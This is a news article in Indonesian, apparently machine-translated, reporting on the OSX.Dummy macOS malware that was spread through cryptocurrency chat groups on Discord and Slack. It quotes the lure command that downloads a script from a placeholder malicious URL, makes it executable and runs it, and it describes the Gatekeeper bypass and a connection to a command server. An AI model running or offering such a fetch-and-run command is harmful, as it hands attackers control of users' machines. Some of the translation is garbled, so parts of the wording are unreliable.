Discord and Slack Cryptocurrency Users Ditabrak oleh Perangkat Lunak “Cryptojacking” yang Berbahaya

Peretas diduga menargetkan kelompok yang berfokus pada cryptocurrency di emulator tempat kerja-emulator dan game-forum Discord untuk membahas cryptocurrency untuk menyusup komputer dengan perangkat lunak “cryptojacking”.

Perselisihan dan Pengguna Kendur Terkena
Diidentifikasi sebagai OSX.Dummy, malware berbasis MacOS tidak secanggih kode hacking yang ditulis secara ahli lainnya, namun memungkinkan “eksekusi kode arbitrer pada mesin yang bisa dimasukkan ke dalam.”

Sebagaimana dinyatakan , para peneliti dari konsorsium cybersecurity Unix menemukan bukti OSX.Dummy, dengan Remco Verhoef dari SANS ‘InfoSec yang mengkonfirmasikan serangkaian serangan jahat pada macos Slack aplikasi pada 30 Juni 2018.

Kabarnya, beberapa chatroom di Discord and Slack telah menimbulkan masalah dengan administrator sistem tentang orang-orang yang meniru anggota grup yang berpengaruh dan mengirim tautan yang tidak diduga ke aplikasi seluler “cryptocurrency” yang berguna.

Saat memasang, aplikasi akan mengunduh dan menjalankan skrip biner “cd / tmp && curl -s curl $ MALICIOUS_URL> skrip && chmod + x skrip && ./script.” Skrip ini adalah file 34 MB dan berisi perangkat lunak OSX.Dummy.

Skrip adalah biner mach064 “biasa” dan mengeksekusi sendiri pada sistem MacOS. Karena ketidakjelasannya, pemindai malware online dan perangkat lunak antivirus bawaan gagal mengenali kode sebagai ancaman.

Biasanya, file biner OSX.Dummy yang tidak ditandatangani tidak dapat berjalan di OS karena protokol keamanan yang ditentukan. Namun, subroutine keamanan macOS, ” Gatekeeper ,” tidak memeriksa file yang telah diunduh secara eksklusif oleh pengguna dan dijalankan di terminal sistem, yang khususnya, adalah satu-satunya cara untuk menjalankan perangkat lunak “membantu”.

Selanjutnya, perangkat lunak meminta pengguna untuk memasukkan kata sandi utama mereka, yang menyediakan akses kode tidak sah ke semua data yang mendasari, fitur, dan kata sandi dari sistem korban. Sebagai langkah terakhir, komputer korban secara otomatis terhubung ke server C2, memberi penyerang akses penuh ke mesin.

Karena korban berasal dari forum yang terkait dengan cryptocurrency , proses ini memberikan penyerang akses langsung ke alamat pribadi, email, kata sandi, dan kunci keamanan pengguna, terbukti sebagai proses “cryptojacking” yang dasar namun efektif.

Ancaman maya baru Cryptojacking secara longgar didefinisikan sebagai peretas menyusup komputer korban untuk menggunakan kekuatan pemrosesan mereka untuk menambang cryptocurrency. Namun, langkah-langkah keamanan yang relatif rendah yang dilakukan oleh bisnis dan pengguna sama-sama membuat sektor cryptocurrency menjadi sasaran yang lunak dan sangat menguntungkan. Seperti yang dilaporkan oleh BTCManager pada Juni 2018, aktivitas terlarang cryptocurrency dari komputer korban telah melonjak 629 persen pada 2018 saja, dengan penyerang tidak menunjukkan tanda-tanda berhenti dalam waktu dekat.